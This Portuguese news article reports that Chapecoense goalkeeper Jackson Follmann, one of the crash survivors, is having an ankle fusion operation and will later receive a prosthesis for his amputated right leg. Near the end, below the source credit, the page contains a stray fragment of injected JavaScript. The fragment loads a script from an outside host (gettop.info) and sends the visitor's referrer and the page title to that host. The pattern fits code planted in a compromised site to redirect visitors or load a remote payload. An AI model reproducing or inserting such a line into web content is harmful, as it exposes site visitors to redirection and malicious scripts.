Goleiro da Chapecoense faz nova cirurgia

                        Jackson Follmann receberá prótese da perna direita depois, em São Paulo

                                                                   Foto: reprodução Globonews

 

O goleiro Jackson Follmann, o último internado dos quatro sobreviventes brasileiros do acidente aéreo com a delegação da Chapecoense, faz nova cirurgia na tarde desta segunda-feira (2). Ainda não há previsão de alta, informou o Hospital Unimed, de Chapecó, em nota. 

A tragédia resultou na morte de 71 pessoas na madrugada de 29 de novembro na Colômia. Apenas seis pessoas sobreviveram.  Conforme o boletim médico, Follmann fará uma “artrodese do tornozelo esquerdo”. De acordo com a assessoria do hospital, este é um procedimento que fixa a articulação por fusão óssea.

Sustentação

O objetivo é dar mais sustentação a perna esquerda. Ainda segundo o hospital, a protése na perna direita, que foi amputada, deve ser colocada posteriormente em São Paulo.  Follmann passou por diversas cirurgias desde o acidente aéreo. Entre elas, operações na perna direita para preparar o corpo para a prótese e procedimentos na coluna, para a fixação de vértebra cervical.

Ainda de acordo com o hospital, ele segue recebendo antibioticoterapia endovenosa e não teve intercorrências clínicas.  Ele fui muito aplaudido na chegada a Chapecó.

 

Fonte: G1

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário